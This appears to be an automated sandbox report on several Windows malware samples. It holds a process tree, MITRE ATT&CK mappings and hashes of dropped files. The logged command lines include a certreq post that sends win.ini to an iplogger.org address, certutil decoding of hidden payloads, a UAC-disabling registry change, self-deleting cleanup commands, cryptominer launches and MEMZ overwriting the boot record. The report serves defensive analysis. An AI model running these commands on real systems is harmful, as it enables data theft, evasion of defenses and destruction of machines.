C:\Windows\explorer.exeC:\Windows\explorer.exe vkhmukwpagbhgxxs0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJS6kTcb2sZJ49Q3iSMDc1H0Gsol2ut25e0CiIvlYsuJiRf9cAIWsM5xNiv2CpmeSTZ4pQrFWNkEzZPEMfhraeOvsLhWY3jY+xzJ5IosXqgTdD3jVluCpzDi91PFz8FAJKOCtA6KcYwvQwF802MT/V1n/CnG34YKGCYZXIU4zRQW7lEbRoAvFGVxIf4tKfOP3Hf6S6LyTk2jeuhzzf2Zcs/0s5y+xhTpkhMOajNG7ary/m9cgvIxlkbwK4Z5kKm8TURafQOdOA6pYc+FSLPejIrpYVXzGzUYCucc1JnrFsvlMQn0ihvM4UYwSpRyIOiJG/Ku6F7NGOK/Ye1L7T6a3ZENVZhlQpPYYNgPEbnhEJs092J41opYOyT9/sUeOPXCLeCFm3ZCgbWVjF7QlJgl7+XRi1qxQqCVy15JYwYPI4ueAg==4⤵PID:5648
-
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap30453:190:7zEvent116071⤵
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
C:\Users\Admin\Downloads\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe"C:\Users\Admin\Downloads\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:2584 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo UfkgJKZQP2⤵PID:4996
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c certreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini2⤵
- System Location Discovery: System Language Discovery
PID:5524 -
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini3⤵
- System Location Discovery: System Language Discovery
PID:5440
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < OLicGk.com2⤵
- System Location Discovery: System Language Discovery
PID:4572 -
C:\Windows\SysWOW64\cmd.execmd3⤵
- System Location Discovery: System Language Discovery
PID:4744 -
C:\Windows\SysWOW64\PING.EXEping -n 1 ALq.Iqg4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4108
-
-
C:\Windows\SysWOW64\certutil.execertutil -decode gvceXcfUhq.com U4⤵
- Manipulates Digital Signatures
- Deobfuscate/Decode Files or Information
PID:5248
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.commsdtc.com U4⤵
- Executes dropped EXE
PID:2492 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com U5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2512 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:452 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\rNjcikt & timeout 2 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe"7⤵PID:440
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
PID:6092
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5876
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < iphPyYJYUVPAWekxoF.com2⤵PID:5284
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:2180
-
C:\Windows\SysWOW64\PING.EXEping -n 1 ovPEN.QDIv4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5140
-
-
C:\Windows\SysWOW64\certutil.execertutil -decode QrHZW.com T4⤵
- Deobfuscate/Decode Files or Information
- System Location Discovery: System Language Discovery
PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.comlsm.com T4⤵
- Executes dropped EXE
PID:2836 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.com T5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4072 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:3360 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\xmmnrlv.exe"7⤵
- System Location Discovery: System Language Discovery
PID:4192
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\qqlrtqid.exe"7⤵
- System Location Discovery: System Language Discovery
PID:3916
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2776
-
-
-
-
C:\Users\Admin\Downloads\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe"C:\Users\Admin\Downloads\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:2428 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo UfkgJKZQP2⤵
- System Location Discovery: System Language Discovery
PID:4420
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c certreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini2⤵PID:1744
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini3⤵
- System Location Discovery: System Language Discovery
PID:2092
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < OLicGk.com2⤵
- System Location Discovery: System Language Discovery
PID:2024 -
C:\Windows\SysWOW64\cmd.execmd3⤵
- System Location Discovery: System Language Discovery
PID:5868 -
C:\Windows\SysWOW64\PING.EXEping -n 1 ALq.Iqg4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3508
-
-
C:\Windows\SysWOW64\certutil.execertutil -decode gvceXcfUhq.com U4⤵
- Deobfuscate/Decode Files or Information
PID:3304
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\msdtc.commsdtc.com U4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:4076 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\nslookup.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\nslookup.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:820 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\fkYq7clGHar & timeout 2 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\nslookup.exe"6⤵PID:1432
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
PID:3168
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2044
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < iphPyYJYUVPAWekxoF.com2⤵PID:1248
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:5136
-
C:\Windows\SysWOW64\PING.EXEping -n 1 ovPEN.QDIv4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1400
-
-
C:\Windows\SysWOW64\certutil.execertutil -decode QrHZW.com T4⤵
- Deobfuscate/Decode Files or Information
PID:4468
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\lsm.comlsm.com T4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2596 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\nslookup.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\nslookup.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Checks processor information in registry
PID:228 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\antehobr.exe"6⤵PID:6052
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\kkkwnmdv.exe"6⤵PID:3220
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3388
-
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap4594:566:7zEvent297481⤵PID:5944
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap9103:566:7zEvent46711⤵PID:872
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\" -ad -an -ai#7zMap11125:190:7zEvent40541⤵PID:1772
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap26577:190:7zEvent195991⤵PID:5964
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap5789:190:7zEvent128521⤵PID:5456
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap14849:78:7zEvent80751⤵PID:2416
-
C:\Users\Admin\Downloads\MEMZ.exe"C:\Users\Admin\Downloads\MEMZ.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2756 -
C:\Users\Admin\Downloads\MEMZ.exe"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5228
-
-
C:\Users\Admin\Downloads\MEMZ.exe"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5232
-
-
C:\Users\Admin\Downloads\MEMZ.exe"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1556
-
-
C:\Users\Admin\Downloads\MEMZ.exe"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4060
-
-
C:\Users\Admin\Downloads\MEMZ.exe"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1564
-
-
C:\Users\Admin\Downloads\MEMZ.exe"C:\Users\Admin\Downloads\MEMZ.exe" /main2⤵
- Checks computer location settings
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5436 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" \note.txt3⤵PID:4976
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"1⤵PID:220
-
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:920 -
C:\Users\Admin\AppData\Roaming\xmrmine.exeC:\Users\Admin\AppData\Roaming\xmrmine.exe2⤵
- Executes dropped EXE
PID:4732
-
-
C:\Users\Admin\AppData\Roaming\etcmin.exeC:\Users\Admin\AppData\Roaming\etcmin.exe2⤵
- Executes dropped EXE
PID:1740
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"1⤵PID:3868
-
C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe"C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3680 -
C:\Users\Admin\hSYcgEcU\uYQUIwYA.exe"C:\Users\Admin\hSYcgEcU\uYQUIwYA.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5776
-
-
C:\ProgramData\dkYkUUoU\OmwEcoEM.exe"C:\ProgramData\dkYkUUoU\OmwEcoEM.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423"2⤵
- System Location Discovery: System Language Discovery
PID:4044 -
C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exeC:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf04233⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4168 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423"4⤵
- System Location Discovery: System Language Discovery
PID:4068 -
C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exeC:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf04235⤵
- Executes dropped EXE
PID:3360 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423"6⤵PID:3492
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 16⤵
- Modifies registry key
PID:452
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 26⤵
- Modifies registry key
PID:3256
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f6⤵
- UAC bypass
- Modifies registry key
PID:2000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AAIcoAEc.bat" "C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe""6⤵PID:6060
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 14⤵
- Modifies visibility of file extensions in Explorer
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5160
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 24⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5460
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f4⤵
- UAC bypass
- Modifies registry key
PID:540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pWocEEoA.bat" "C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe""4⤵PID:2252
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 12⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3100
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 22⤵
- Modifies registry key
PID:2924
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f2⤵
- UAC bypass
- Modifies registry key
PID:5824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EaEUswYg.bat" "C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe""2⤵PID:2812
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs3⤵
- System Location Discovery: System Language Discovery
PID:4948
-
-
-
C:\Users\Admin\Downloads\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe"C:\Users\Admin\Downloads\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4368
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2JavaScript
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Deobfuscate/Decode Files or Information
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
4Obfuscated Files or Information
1Command Obfuscation
1Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1SIP and Trust Provider Hijacking
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Query Registry
6Remote System Discovery
1System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
198B
MD59fba3d05ec1b93fd77ca57c02a164f68
SHA117574bd470e088970f1ef66672041481cd3cad06
SHA256c1c08d9c70015912540d8fa49f15fd5ac10d6b9f5170008f7d8a74bba40e27ee
SHA512120b769b76bff1b6952ef5d5739e438c985d12f9f1d5df75bdf3b71b54c2b8a7ee203a966ffb5476e7f02240a5b359d5069fff218c84bfbdab6847964a0e7e21
-
Filesize
198B
MD5abe773df3b75234b5448bed73361a48e
SHA15a54ab9c6f360183409893c16758212e24a345e2
SHA256b234ccd40b2c00247a56a60ada8a79d8d3b3eb2870fc692343825703b606916e
SHA51237e77c24aea9f89f0c5bb2dfb712d69d8b23987e0892c5f7cc4ea740b1bd04e7d3741fac0d0c75d6339cbf9b6cb8ad638d2a43e87bec2c1d4fcda4c137f2f9af
-
Filesize
539B
MD5b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
Filesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
Filesize
152B
MD56738f4e2490ee5070d850bf03bf3efa5
SHA1fbc49d2dd145369e8861532e6ebf0bd56a0fe67c
SHA256ca80bbae3c392e46d730a53d0ee4cfecbbe45c264ad3b3c7ee287252c21eaeab
SHA5122939edf5e6c34c9ea669a129a4a5a410fbbd29cd504dc8e007e9b3b3c7fbb9bea8c14d6177ac375d0c481995774a02d210328569231cb01db07b59452333b22b
-
Filesize
152B
MD593be3a1bf9c257eaf83babf49b0b5e01
SHA1d55c01e95c2e6a87a5ece8cc1d466cc98a520e2a
SHA2568786fd66f4602e6ed3fa5248bd597b3f362ffa458f85207eaa154beb55522348
SHA512885b09dd3072921f375eedb5f0575561adc89700ecfbe999bc3e5ea1d7cb45e19d85c5e420f2c0a12b428742e1110e66f4ceecbe5a6badddd36cc9e0aff48e52
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize1KB
MD5cb48de1885f92bf1d8c35e300ddddee0
SHA1598c0a9167f447773f05106b9f3a98f98ea3fa85
SHA25637f2ca561bfafc1a25d77d2b7bc3cb924f83095339e2be62315ed8b062918aee
SHA51289feb3e23a7442b55a9d7b442498e33948266377917f3bb0af6af097961474780b78adf77b4cdffc8e6faa9212daacb0ae4d69e8ac59f88259f8cf61fe509fc8
-
Filesize
580B
MD523d0f3e132a021688040356991b1c978
SHA15373ecd8851a6a149de983c543e1ae6c9b150b0d
SHA256b25aa78ea2d1f16a49f6a788a43ca2c79953d4ad0f0f5414fcfeaba62ce03e53
SHA5129bc5484415ac42f051daf38f5c8e57df54d3b72a90f99233d76c5d0f0ad6325bd04c0c5e6ccf4b2c6141ddd1123cc137bea8fc2597951708e96461929dc9758e
-
Filesize
663B
MD5a3eabe3bdd2a80fe26581d5d0a7bdf9f
SHA18db1c3692014536d50ed1f0a556c1373eae626f2
SHA256e9cf563fae3b2915af3f25ac054cc577a16f05ea89dab67ea112183d2b0bd4bd
SHA51235ecc0a18a168cd251f48507cd057ffad28b17e08496220f10e8db39ba5fdc51071141e03c32c9ab901cca9535c37d6063d5474cacdbaeafb8e079de95bac045
-
Filesize
5KB
MD540c92476fbb54c4c894f429dd2a26cce
SHA117c4cf7385fcf3797ae2c90e82c5b87a87e38fc5
SHA256aa8ca05fd14bd0fe2538943ee7419e054d8937f74269a24582590697452af198
SHA51259519933dba53fe6b086171d51f47dbe2bf87b62b5e95f9cf0e672aaaa95cfe17f4a475c218df7f35b51ea2e6cfd5215bfc4819194063970102995cdeac17e2e
-
Filesize
6KB
MD51351b70d76bac76145b555ec39d887e7
SHA1b90f86ad9686689118894cea162ecd72863df1b7
SHA256c7c9d66292ac82ba78113f9209a1c3013ad04d86fc90a3482fc152d7be453371
SHA5124c6a4b1f28fdb2ed426199fa8ed1560d0bed5d02603a15dd3737dc89f287fef2d9224eff301706e3d8c3e83e25451c4310c6bd174e05a6c91ca32bd4e39c074a
-
Filesize
6KB
MD5e720b0e75e3b69394effc79a20188db6
SHA1f30a35913708f82f0afe63cde6be8541ee4d4325
SHA256874c06db907c52a04cbae6082432a1adb2f99b78e6cb105f8d1065d5c40f5f0d
SHA5121f8f0dee459d5e4ff25bd23955821ac41a215cd51cefd19d88f040535fe9cbcfc5c7c3e2e56b44e29ad2729da5c902f146bae8745a4ada40f734a191676cda85
-
Filesize
6KB
MD52f4bf8efbf27b752e2680ff67befef95
SHA1ae27b6c958fb36b3cdbacd732c8e6a71595acac6
SHA2560de986d42f8836d463d87cc3e78281bb2e7ce5c83f8d805424c5545f9a92e620
SHA512df5c86e1106443800d7d40befd4812544ed127f1bdecfad25e3613ea28eb55068a512afda8d9a565c3643cf9e8a52adebae91cc65113f89b3d9ddd8a37043c1f
-
Filesize
6KB
MD56872900ed344e59b09129e05ec3fe09b
SHA1081c977ce564215b768771b245a5dfca9ffc27eb
SHA256ac782adc9607b52fb9b071ecc2e782d9ee86556dbb836971368455f576b0db1d
SHA512beee682e3328b600f18c0139d66a6743009d61d1e0c2847113dccfdadeeefc4517f772c0b0d8b648f49045d1f8e299816f696ee1de098b9a46381e65d729fd2d
-
Filesize
6KB
MD51d264ed995d40e4c015d9116b330458b
SHA17700f98f3cb2a8a7136fbbdc4001830a89672f40
SHA256d5cdd6ad1350528520dab14e2ce6973742372b83178ebd06f7e4bac5f515167a
SHA5127494cdeb2bbc81cfa58aab24a46260da6ec5f3af7ff072903107596eb3fac3cef1f28beed40e6854941a2e3f6018ca1283c5147a6a8dbb0ebac48dba61d1bb7a
-
Filesize
6KB
MD5e7b566e50537124dc04d1feb1bf7ee31
SHA1ec5e347f78894e809cd47de61e1e6ef64ab93265
SHA256f2f04baab2793a6f00e2cacdd1e124b1a6df2c62f393873425504fa0a0b1a06c
SHA5121dd7f161344627d892cbba7c58428736aa8f4d76ffe2acb4f62894b11257da472a31303590e410acc0dee45ee0a1b8fb67209582f82103d94e1a8575cac6199f
-
Filesize
6KB
MD5dbd3e7521e3597d8d1de25d6c94f7c1a
SHA138be6842230e865cf118790e819de17aeb375b60
SHA256c25abb05460568a026166a9bbe3d49c1b3a7dc6c4ec0db49d455dec0202872a1
SHA5126d3c8017b86a71d0d19417daeae14fdbd3960d0f1c5d99165e9b3c1cb2cb756fb834768bb821857c809855bf3e996c5e93d7efd09a3de69237bf0763446a1ff2
-
Filesize
6KB
MD500828639ad2ccb1fd1521d5cc59ddc1f
SHA10fd15a19f978bc6bc1cd271d2997549b715f744b
SHA25631c4da0018f2c4f2854d94a5519b0fd6ee2c5ed998acd036798bfa5b3bfcecc5
SHA512a83d8a8b493061660b4116591fc1c5ce8336f0b7fa1ddbd0ef68dc4b2049d2eec71553c19495b9dc3229644afb970958d48357611131d975aba2e2659112deda
-
Filesize
6KB
MD56d0613c0b6f0261d049ca990fa010d73
SHA1697e6294c354c92b20389aac324a97223eed9d22
SHA256a60c5ebe14a5a0b6322e49429150c3dc52155176a61eb084ca24632e58caa65e
SHA512c011ea5993c4b5e40e182838c660228c20b1bebe801427121dd0c254df0a3a7949291230d30b871a9c832446b71432ece761ed9d0e268a7fa5453e41e9f8f2d6
-
Filesize
6KB
MD5e0686ab7ebbb05442dd4bf3fd7bf1791
SHA1943c869c66990d7c7abf193d1081b13aab37e1a8
SHA256ccbe63cb746f507f30e7d072b610df412d15edaf99adf688a016e3db905b4ee5
SHA512efa33fcfecd5bee0e9f22dc3f844fdb47a31b9be098c8e5d028a4086a906045a4a059ffc84f6985d824b2c3e545697cb5e8c0175160e7c8cf8c13b6312ca6389
-
Filesize
6KB
MD54cd5b00c0617dd0938b3e62cb287613e
SHA12d97639cf96d4a60c1e89915f481b4d9422dea8c
SHA256ecdbd29693e04349dba41791706dde2f1db7bcd88dc5643d21d7e176e4078f27
SHA5128e9d90cb850554a9c2bfb90395f394b526175b50b86942045c824124f6fd82527f280c39494c9a3354ba76b2b45df54ce7e069f7a9bf54be5637f50b68554c24
-
Filesize
1KB
MD5d6fe13658ebdb658253643dad9b2b0fd
SHA1303d230d1da5be2ebb27abc5ef92e5fb53c268b1
SHA2568e5ef9043b237367e47338dda7224d3272c5e26c9b257a9407703296e3592446
SHA5124c4941e5c666533dd5d906aa0d22b98e55d777bdcec131bace5bcd0b6421fbf3be35be9aa456fee830f9ef1c97acf8da01b14fe1bf2c6325896b589ad75f1218
-
Filesize
1KB
MD518a0830063d83fa2217e98a7a06885c6
SHA17cbd3f1e490026dd38867393cc794b024aee65fa
SHA256675138c686397e7e300a0635300053207fb54b75963db5cc54ac4d5520247388
SHA5129c915bf85aab4c368abcdca1c33bfe7aefea1871a12f08609d0fb8d8b3121fe937685b467b7efa2d534044adee5cb7bff5646631955ef719c0ba89f8f38219d9
-
Filesize
1KB
MD5d1e488a0e3a65924d973cf1722863947
